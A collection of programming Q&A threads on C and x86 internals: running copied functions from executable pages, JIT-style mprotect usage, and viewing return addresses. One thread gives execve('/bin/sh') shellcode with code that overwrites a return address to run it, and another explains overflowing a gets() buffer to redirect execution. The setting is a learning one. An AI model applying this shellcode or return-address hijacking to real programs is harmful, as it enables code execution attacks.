I'm trying to copy a function I have to an executable page and run it from there, but I seem to be having some problems.
Here is my code:
#include <stdio.h>
#include <string.h>
#include <windows.h>
int foo()
{
return 4;
}
int goo()
{
return 5;
}
int main()
{
int foosize = (int)&goo-(int)&foo;
char* buf = VirtualAlloc(NULL, foosize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (buf == NULL)
{
printf("Failed\n");
return 1;
}
printf("foo %x goo %x size foo %d\n", &foo, &goo, foosize);
memcpy (buf, (void*)&foo, foosize);
int(*f)() = &foo;
int ret1 = f();
printf("ret 1 %d\n", ret1);
int(*f2)() = (int(*)())&buf;
int ret2 = f2 (); // <-- crashes here
printf("ret2 %d\n", ret2);
return 0;
}
I know some of the code is technically UB ((int)&goo-(int)&foo), but it behaves fine in this case.
My question is: why is this not working as expected?
It seems to me I mapped a page as executable, copied an existing function there, and I'm just calling it.
What am I missing?
Would this behave differently on Linux with mmap?
Thanks in advance
As everyone has already stated in the comments, this is undefined behavior and you should never really expect it to work. However, I played with your code in the debugger and realized the reason it's not working (at least with the Cygwin gcc compiler): you're creating f2 incorrectly, so that it points to the address of the pointer storing the allocated memory, namely buf. You want it to point to the memory that buf points to. Therefore, your assignment should be
int(*f2)() = (int(*)())buf;
With that change, your code executes for me. But even if it works, it might break again as soon as you make any additional changes to the program.
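To make the difference between &buf and buf visible without executing any copied code, here is a minimal sketch. The helper name pointer_and_pointee_differ is made up for illustration, and malloc stands in for VirtualAlloc so that the example is not Windows-specific.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical helper: returns 1 when the address OF the pointer variable
   differs from the address stored IN the pointer variable. */
int pointer_and_pointee_differ(void)
{
    char *buf = malloc(16);                    /* stand-in for VirtualAlloc */
    assert(buf != NULL);

    void *address_of_variable = (void *)&buf;  /* where buf itself lives */
    void *address_in_variable = (void *)buf;   /* the allocated block */

    printf("&buf = %p, buf = %p\n", address_of_variable, address_in_variable);

    int differ = (address_of_variable != address_in_variable);
    free(buf);
    return differ;
}
```

Casting &buf to a function pointer, as the question does, makes the call jump to the bytes of the pointer variable itself rather than to the copied function.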
Well, I tried your code with MSVC 2008 in debug mode. The compiler happens to create a jmp table with relative offsets, and &foo and &goo are just entries in that table.
So even if you have successfully created an executable buffer and copied the code (much more than was useful...), the relative jump now points to a different location and (in my example) soon fell into an int 3 trap!
TL;DR: as the compiler can arrange its code at will, and as many jumps use relative offsets, you cannot rely on copying executable code. It really is Undefined Behaviour:
if the compiler had been smart enough to just generate something like:
mov eax, 4
ret
it could have worked
if the compiler has generated more complicated code with a relative jump, it just breaks
Conclusion: you can only copy executable code if you have full control over the binary machine code, for example if you used assembly code and know you will have no relocation problems.
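The arithmetic behind the relative-jump problem can be sketched as follows. This assumes the 5-byte x86 form of jmp (opcode E9 followed by a 32-bit displacement), whose target is computed from the address of the next instruction; the function names are invented for this illustration.

```c
#include <assert.h>
#include <stdint.h>

#define JMP_REL32_LEN 5u  /* opcode E9 + 4-byte displacement */

/* Where an x86 `jmp rel32` located at insn_addr transfers control. */
uintptr_t jmp_rel32_target(uintptr_t insn_addr, int32_t rel32)
{
    return insn_addr + JMP_REL32_LEN + (uintptr_t)(intptr_t)rel32;
}

/* Displacement needed so that a jmp placed at insn_addr reaches target. */
int32_t jmp_rel32_for(uintptr_t insn_addr, uintptr_t target)
{
    intptr_t delta = (intptr_t)(target - (insn_addr + JMP_REL32_LEN));
    assert(delta >= INT32_MIN && delta <= INT32_MAX); /* must fit in rel32 */
    return (int32_t)delta;
}
```

A jump at 0x1000 with displacement 0x20 lands at 0x1025. The same bytes copied to 0x5000 land at 0x5025, so a plain memcpy silently retargets the jump; reaching the original target from the new location would require rewriting the displacement to jmp_rel32_for(0x5000, 0x1025).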
You need to declare foo and goo as static, or you will have to disable Incremental Linking.
Incremental linking is used to shorten the linking time when building your applications. The difference between normally and incrementally linked executables is that in incrementally linked ones each function call goes through an extra JMP instruction emitted by the linker.
These JMPs allow the linker to move the functions around in memory without updating all the CALL instructions that reference the function. But it's exactly this JMP that causes problems in your case. Declaring a function as static prevents the linker from creating this extra JMP instruction.
I have the following code which is supposed to drop a shell, however, after I run the code nothing appears to happen. Here is the code that I have. This was taken from the shellcoder's handbook.
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
I compile it using gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
When I run it the following happens.
The expected result is the following.
Here is the code that produces the above results:
int main()
{
char *name[2];
name[0] = "/bin/sh";
name[1] = 0x0;
execve(name[0], name, 0x0);
exit(0);
}
I am not sure why this is happening. I am using Ubuntu on Windows 10. This might not affect my results, but I have disabled ASLR. That might be an issue. I have not tried this on a VM just yet. I wanted to try and figure out why this is not working before I did that. If this is unclear please let me know and I will be happy to clarify any details.
I appreciate all of your help in advance.
--UPDATE--
I was able to get the assembly instructions from the shellcode I provided.
Does anyone see any issues that would cause a shell not to be dropped?
With the help of a colleague we were able to figure out why the shellcode was not executing. The shellcode is fine; the issue was actually an update to the gcc compiler which changes how the prologue/epilogue are handled when code executes. When a program starts, the compiler-generated code puts the return address on the stack, but it does so using a new pattern. The executing program no longer uses the return address directly by popping it into the instruction pointer (IP). Instead, it pops the stack value into %ecx and then uses the contents at the address %ecx-4 (for 32-bit machines) as the return address. Therefore, the way I was trying to do it was never going to work, even with the protections turned off. This behavior only affects main() and not functions called by main. So a simple solution would be to place the contents of main into another function foo() and call foo() from main() as depicted below.
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
void foo()
{
int *ret;
ret = (int *)&ret + 4;
(*ret) = (int)shellcode;
}
int main()
{
foo();
}
Here is a question that is related to this answer.
Understanding new gcc prologue
There are a couple of things that could go wrong here:
The store of the shellcode address is optimized away because it is derived from a stack variable, and nothing reads from the stack afterwards.
The store is optimized away because it is out of bounds.
The offset calculation from the local variable is wrong, so the shellcode address does not overwrite the return address. (This is what happens when I compile your example.)
The execution is redirected, but the shellcode does not run because it is located in the non-executable .data segment. (That would cause the process to terminate with a signal, though.)
I'm trying to write a function that copies a function (and eventually modifies its assembly) and returns it. This works fine for one level of indirection, but at two I get a segfault.
Here is a minimum (not)working example:
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#define BODY_SIZE 100
int f(void) { return 42; }
int (*G(void))(void) { return f; }
int (*(*H(void))(void))(void) { return G; }
int (*g(void))(void) {
void *r = mmap(0, BODY_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
memcpy(r, f, BODY_SIZE);
return r;
}
int (*(*h(void))(void))(void) {
void *r = mmap(0, BODY_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
memcpy(r, g, BODY_SIZE);
return r;
}
int main() {
printf("%d\n", f());
printf("%d\n", G()());
printf("%d\n", g()());
printf("%d\n", H()()());
printf("%d\n", h()()()); // This one fails - why?
return 0;
}
I can memcpy into an mmap'ed area once to create a valid function that can be called (g()()). But if I try to apply it again (h()()()) it segfaults. I have confirmed that it correctly creates the copied version of g, but when I execute that version I get a segfault.
Is there some reason why I can't execute code in one mmap'ed area from another mmap'ed area? From exploratory gdb-ing with x/i checks, it seems like I can call down successfully, but when I return, the function I came from has been erased and replaced with 0s.
How can I get this behaviour to work? Is it even possible?
BIG EDIT:
Many have asked for my rationale, as I am obviously doing an XY problem here. That is true and intentional. You see, a little under a month ago this question was posted on the code golf stack exchange. It also got itself a nice bounty for a C/Assembly solution. I gave some idle thought to the problem and realized that by copying a function's body while stubbing out an address with some unique value, I could search its memory for that value and replace it with a valid address, thus allowing me to effectively create lambda functions that take a single pointer as an argument. Using this I could get single currying working, but I need the more general currying. Thus my current partial solution is linked here. This is the full code that exhibits the segfault I am trying to avoid. While this is pretty much the definition of a bad idea, I find it entertaining and would like to know if my approach is viable or not. The only thing I'm missing is the ability to run a function created from a function, but I can't get that to work.
The code is using relative calls to invoke mmap and memcpy so the copied code ends up calling an invalid location.
You can invoke them through a pointer, e.g.:
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#define BODY_SIZE 100
void* (*mmap_ptr)(void *addr, size_t length, int prot, int flags,
int fd, off_t offset) = mmap;
void* (*memcpy_ptr)(void *dest, const void *src, size_t n) = memcpy;
int f(void) { return 42; }
int (*G(void))(void) { return f; }
int (*(*H(void))(void))(void) { return G; }
int (*g(void))(void) {
void *r = mmap_ptr(0, BODY_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
memcpy_ptr(r, f, BODY_SIZE);
return r;
}
int (*(*h(void))(void))(void) {
void *r = mmap_ptr(0, BODY_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
memcpy_ptr(r, g, BODY_SIZE);
return r;
}
int main() {
printf("%d\n", f());
printf("%d\n", G()());
printf("%d\n", g()());
printf("%d\n", H()()());
printf("%d\n", h()()()); // This one fails - why?
return 0;
}
I'm trying to write a function that copies a function
I think that is pragmatically not the right approach, unless you know very well machine code for your platform (and then you would not ask the question). Be aware of position independent code (useful because in general mmap(2) would use ASLR and give some "randomness" in the addresses). BTW, genuine self-modifying machine code (i.e. changing some bytes of some existing valid machine code) is today cache and branch-predictor unfriendly and should be avoided in practice.
I suggest two related approaches (choose one of them).
Generate some temporary C file (see also this), e.g. in /tmp/generated.c, then fork a compilation of it into a plugin using gcc -Wall -g -O -fPIC /tmp/generated.c -shared -o /tmp/generated.so, then dlopen(3) (for dynamic loading) that /tmp/generated.so shared object plugin (and probably use dlsym(3) to find function pointers in it...). For more about shared objects, read Drepper's How To Write Shared Libraries paper. Today, you can dlopen many hundreds of thousands of such shared libraries (see my manydl.c example) and C compilers (like recent GCC) are fast enough to compile a few thousand lines of code in a time compatible with interaction (e.g. less than a tenth of a second). Generating C code is a widely used practice. In practice you would represent some AST in memory of the generated C code before emitting it.
Use some JIT compilation library, such as GCCJIT, or LLVM, or libjit, or asmjit, etc.... which would generate a function in memory, do the required relocations, and give you some pointer to it.
BTW, instead of coding in C, you might consider using some homoiconic language implementation (such as SBCL for Common Lisp, which compiles to machine code at every REPL interaction, or any dynamically constructed S-expr program representation).
The notions of closures and of callbacks are worthwhile to know. Read SICP and perhaps Lisp In Small Pieces (and of course the Dragon Book, for general compiler culture).
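As a rough illustration of the closure idea in plain C, without copying or patching machine code, a "curried" function can be represented as a code pointer bundled with its captured data. This is only a sketch; struct adder, adder_call and make_adder are hypothetical names, not part of any library.

```c
#include <assert.h>
#include <stdlib.h>

/* A closure: a code pointer plus the captured environment. */
struct adder {
    int (*call)(const struct adder *self, int x);
    int captured;
};

/* The shared code; the captured value arrives through self. */
static int adder_call(const struct adder *self, int x)
{
    return self->captured + x;
}

/* "Curry" the first argument of add(a, b). The caller frees the result. */
struct adder *make_adder(int a)
{
    struct adder *c = malloc(sizeof *c);
    assert(c != NULL);
    c->call = adder_call;
    c->captured = a;
    return c;
}
```

A caller would write struct adder *add40 = make_adder(40); and then add40->call(add40, 2). The cost compared with a real function pointer is the explicit self argument, which is exactly what the machine-code-copying trick tries to hide.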
this question was posted on code golf.SE
I updated the 8086 16-bit code-golf answer on the sum-of-args currying question to include commented disassembly.
You might be able to use the same idea in 32-bit code with a stack-args calling convention to make a modified copy of a machine code function that tacks on a push imm32. It wouldn't be fixed-size anymore, though, so you'd need to update the function size in the copied machine code.
In normal calling conventions, the first arg is pushed last, so you can't just append another push imm32 before a fixed-size call target / leave / ret trailer. If writing a pure asm answer, you could use an alternate calling convention where args are pushed in the other order. Or you could have a fixed-size intro, then an ever-growing sequence of push imm32 + call / leave / ret.
The currying function itself could use a register-arg calling convention, even if you want the target function to use i386 System V for example (stack args).
You'd definitely want to simplify by not supporting args wider than 32 bit, so no structs by value, and no double. (Of course you could chain multiple calls to the currying function to build up a larger arg.)
Given the way the new code-golf challenge is written, I guess you'd compare the total number of curried args against the number of args the target "input" function takes.
I don't think there's any chance you can make this work in pure C with just memcpy; you have to modify the machine code.
Is there any way to put processor instructions into array, make its memory segment executable and run it as a simple function:
int main()
{
char myarr[13] = {0x90, 0xc3};
void (*myfunc)() = (void (*)()) myarr;
myfunc();
return 0;
}
On Unix (these days, that means "everything except Windows and some embedded and mainframe stuff you've probably never heard of") you do this by allocating a whole number of pages with mmap, writing the code into them, and then making them executable with mprotect.
void execute_generated_machine_code(const uint8_t *code, size_t codelen)
{
// in order to manipulate memory protection, we must work with
// whole pages allocated directly from the operating system.
static size_t pagesize;
if (!pagesize) {
pagesize = sysconf(_SC_PAGESIZE);
if (pagesize == (size_t)-1) fatal_perror("getpagesize");
}
// allocate at least enough space for the code + 1 byte
// (so that there will be at least one INT3 - see below),
// rounded up to a multiple of the system page size.
size_t rounded_codesize = ((codelen + 1 + pagesize - 1)
/ pagesize) * pagesize;
void *executable_area = mmap(0, rounded_codesize,
PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0);
// mmap reports failure with MAP_FAILED, not with a null pointer
if (executable_area == MAP_FAILED) fatal_perror("mmap");
// at this point, executable_area points to memory that is writable but
// *not* executable. load the code into it.
memcpy(executable_area, code, codelen);
// fill the space at the end with INT3 instructions, to guarantee
// a prompt crash if the generated code runs off the end.
// must change this if generating code for non-x86.
// (cast to char * first: arithmetic on void * is a GNU extension)
memset((char *)executable_area + codelen, 0xCC, rounded_codesize - codelen);
// make executable_area actually executable (and unwritable)
if (mprotect(executable_area, rounded_codesize, PROT_READ|PROT_EXEC))
fatal_perror("mprotect");
// now we can call it. passing arguments / receiving return values
// is left as an exercise (consult libffi source code for clues).
((void (*)(void)) executable_area)();
munmap(executable_area, rounded_codesize);
}
You can probably see that this code is very nearly the same as the Windows code shown in cherrydt's answer. Only the names and arguments of the system calls are different.
When working with code like this, it is important to know that many modern operating systems will not allow you to have a page of RAM that is simultaneously writable and executable. On such a system, if I'd written PROT_READ|PROT_WRITE|PROT_EXEC in the call to mmap or mprotect, it would fail. This is called the W^X policy; the acronym stands for Write XOR eXecute. It originates with OpenBSD, and the idea is to make it harder for a buffer-overflow exploit to write code into RAM and then execute it. (It's still possible; the exploit just has to find a way to make an appropriate call to mprotect first.)
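The page-rounding expression used in the function above can be checked in isolation. Here is a small sketch; round_up_to_multiple is a name made up for this example, and 4096 in the usage note is only an assumed page size (the real value comes from sysconf(_SC_PAGESIZE)).

```c
#include <assert.h>
#include <stddef.h>

/* Round n up to the next multiple of pagesize (n itself if already aligned). */
size_t round_up_to_multiple(size_t n, size_t pagesize)
{
    assert(pagesize != 0);
    return ((n + pagesize - 1) / pagesize) * pagesize;
}
```

With an assumed 4096-byte page, 1 byte and 4096 bytes both round to 4096, while 4097 rounds to 8192. The function above passes codelen + 1, so a code blob that exactly fills a page still gets a second page and therefore at least one trailing INT3.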
Depends on the platform.
For Windows, you can use this code:
// Allocate some memory as readable+writable
// TODO: Check return value for error
LPVOID memPtr = VirtualAlloc(NULL, sizeof(myarr), MEM_COMMIT, PAGE_READWRITE);
// Copy data
memcpy(memPtr, myarr, sizeof(myarr));
// Change memory protection to readable+executable
// Again, TODO: Error checking
DWORD oldProtection; // Not used but required for the function
VirtualProtect(memPtr, sizeof(myarr), PAGE_EXECUTE_READ, &oldProtection);
// Assign and call the function
void (*myfunc)() = (void (*)()) memPtr;
myfunc();
// Free the memory
VirtualFree(memPtr, 0, MEM_RELEASE);
This code assumes a myarr array as in your question's code, and it assumes that sizeof will work on it, i.e. it has a directly defined size and is not just a pointer passed from elsewhere. If the latter is the case, you would have to specify the size in another way.
Note that here there are two "simplifications" possible, in case you wonder, but I would advise against them:
1) You could call VirtualAlloc with PAGE_EXECUTE_READWRITE, but this is in general bad practice because it would open an attack vector for unwanted code execution.
2) You could call VirtualProtect on &myarr directly, but this would make executable whatever page in your memory happens to contain your array, which is even worse than #1 because there might be other data in this page that is now suddenly executable as well.
For Linux, I found this on Google but I don't know much about it.
Very OS-dependent: not all OSes will deliberately (read: without a bug) allow you to execute code in the data segment. DOS will because it runs in Real Mode, Linux can also with the appropriate privileges. I don't know about Windows.
Casting is often undefined and has its own caveats, so some elaboration on that topic here. From C11 standard draft N1570, §J.5.7/1:
A pointer to an object or to void may
be cast to a pointer to a function, allowing data to be invoked as a
function (6.5.4).
(Formatting added.)
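So, on implementations that provide this common extension (Annex J.5 lists common extensions, not requirements of the standard), it's fine and should work as expected. Of course, you would need to adhere to the ABI's calling convention.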
I am trying to perform a buffer overflow to change the call from function A to function B. Is this do-able? I know I will have to figure out how many bytes I have to enter until I have control over the return pointer, and figure out the address of function B. Is it possible to alter it so that after "x==10" we inject function B's address instead of functionA?
Edit:
Is it possible that after fillbuff is called, instead of returning to main, we send it to function B?
Any hints are appreciated.
int fillBuff(int x){
char buff[15];
puts("Enter your name");
gets(buff);
return(x + 5);
}
void functionA(){
puts("I dont want to be here");
exit(0);
}
void functionB(){
printf("I made it!");
exit(0);
}
int main(){
int x;
x = fillBuff(5);
if (x == 10){
functionA();
}
}
Here is an article that shows how to do it: http://insecure.org/stf/smashstack.html.
Compile your program like this: gcc -g program.c (with the -g; without -c, so that the a.out executable is actually produced)
and run gdb ./a.out. Then run the command disas main. You should see the disassembly of your code and how it is laid out in memory. You can replace main with the name of any other function to see its code.
For more information about disassembly, see: https://sourceware.org/gdb/onlinedocs/gdb/Machine-Code.html
Running GDB and disassembling the functions on my computer, the address of functionA() is 0x400679 and the address of functionB() is 0x40068a. If you look at the disassembly of the main function, there is a call to the address 0x400679, and what you want is to change it to 0x40068a.
Basically, you have to overflow the buffer in function fillBuff and, once you reach the slot that holds the saved return address, fill it with the address of functionB. The article shows how to do it.
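On x86 and x86-64 the address bytes are stored least significant byte first, so the address has to be laid out that way in the input. A minimal sketch of that byte ordering follows; pack_little_endian is a hypothetical helper, and 0x40068a is only the address observed on the answerer's machine, so it will differ elsewhere.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store addr into out[0..width-1], least significant byte first. */
void pack_little_endian(uint64_t addr, unsigned char *out, size_t width)
{
    assert(out != NULL && width <= sizeof addr);
    for (size_t i = 0; i < width; i++) {
        out[i] = (unsigned char)(addr >> (8 * i));
    }
}
```

For 0x40068a and a width of 8 this yields the bytes 8a 06 40 00 00 00 00 00. Note that gets stops reading at a newline, so an address containing the byte 0x0a could not be delivered through this input path.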
Buffer overflows are undefined behavior in C. Nothing is guaranteed to occur when you buffer overflow, and as far as I'm aware the language doesn't require a specific memory layout for local variables and/or stored return addresses. In addition to this, some compilers insert stack protectors to make buffer overflow attacks more difficult.
If you want to have defined behavior, you are going to need to look at the assembly produced and figure out what a buffer overflow is going to do. Based on the assembly produced, you can determine the stack layout and the address layout and try to overwrite the return address with a different function's address.
If you're using GCC, the command line option to print out the assembly is -Wa,-al. If you want Intel syntax, add -masm=intel.
I have some C code that calls a function. I'm compiling this code in Visual Studio on Windows. Is there a straightforward way to view the return instruction (opcode) and the return address?
I tried to use the memory window in Visual Studio, but I only see my buffer "blie" and some hexadecimal interpreted memory values. I think CC might be an opcode, but I'd like to have a way/software to clearly view the return instruction and the return address.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int foo(char *);
int main(int argc, char *argv[])
{
if (argc != 1)
return printf("Supply an argument, dude\n");
foo(argv[0]);
return 0;
}
int foo(char *input)
{
unsigned char buffer[600] = "";
printf("Adres: %.8X\n", &buffer);
strcpy(buffer, input);
return 0;
}
The return address is located in the stack memory region (pointed to by the rsp register, assuming you are on x86_64), while the code that performs the function return is located in the code memory region. If you want to see the return address, stop your process on the RET instruction and look at the top of the stack.
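Besides stopping in a debugger, the return address can also be read from inside the program. The sketch below assumes GCC or Clang, which provide __builtin_return_address; the question uses Visual Studio, where the comparable intrinsic is _ReturnAddress() from <intrin.h>. The function names are made up for illustration.

```c
#include <assert.h>
#include <stdio.h>

/* noinline so the function keeps its own call and return (GCC/Clang attribute). */
__attribute__((noinline)) void *current_return_address(void)
{
    /* Level 0 = the address this very function will return to. */
    return __builtin_return_address(0);
}

/* Prints the address of the instruction following the call made below. */
void report_return_address(void)
{
    void *ra = current_return_address();
    assert(ra != NULL);
    printf("call returns to %p\n", ra);
}
```

The printed value is an address inside report_return_address, namely the instruction right after the call, which is the same value a debugger shows at the top of the stack when stopped on the RET.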
If you only want to look at the generated code you can use a disassembler. As you are using Windows you can try the open source x64dbg. Other options exist, such as IDA Pro and you can view a list of others in this question: https://reverseengineering.stackexchange.com/questions/1817/is-there-any-disassembler-to-rival-ida-pro
Documentation excerpt:
The RET instruction transfers program control from the procedure currently being
executed (the called procedure) back to the procedure that called it (the
calling procedure). Transfer of control is accomplished by copying the return
instruction pointer from the stack into the EIP register.
As you can see, the return address is on the stack, so you cannot see it in the disassembly.
Regarding finding the return instruction: not easy. Most probably you use an x86 CPU, which is CISC and has variable-length opcodes (in contrast to RISC). This means that in order to find any opcode you must first decode all the instructions before it.
BTW: You can see the disassembly of your code in VS.
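To illustrate why variable-length encodings make a raw byte search unreliable, here is a small sketch that counts 0xC3 bytes (the one-byte near RET opcode) in a buffer. The sample bytes are a hand-assembled encoding of mov eax, 0xC3 followed by ret; the names count_c3_bytes and sample_code are invented for this example.

```c
#include <assert.h>
#include <stddef.h>

/* Naive scan: counts every byte equal to 0xC3, whether or not it is a RET. */
size_t count_c3_bytes(const unsigned char *code, size_t len)
{
    assert(code != NULL);
    size_t hits = 0;
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0xC3) {
            hits++;
        }
    }
    return hits;
}

/* mov eax, 0xC3 -> B8 C3 00 00 00 ; ret -> C3 */
const unsigned char sample_code[] = { 0xB8, 0xC3, 0x00, 0x00, 0x00, 0xC3 };
```

The scan reports two hits for sample_code, but only the last byte is a return instruction; the first 0xC3 is part of the immediate operand of mov. Telling them apart requires decoding from a known instruction boundary, which is what a disassembler does.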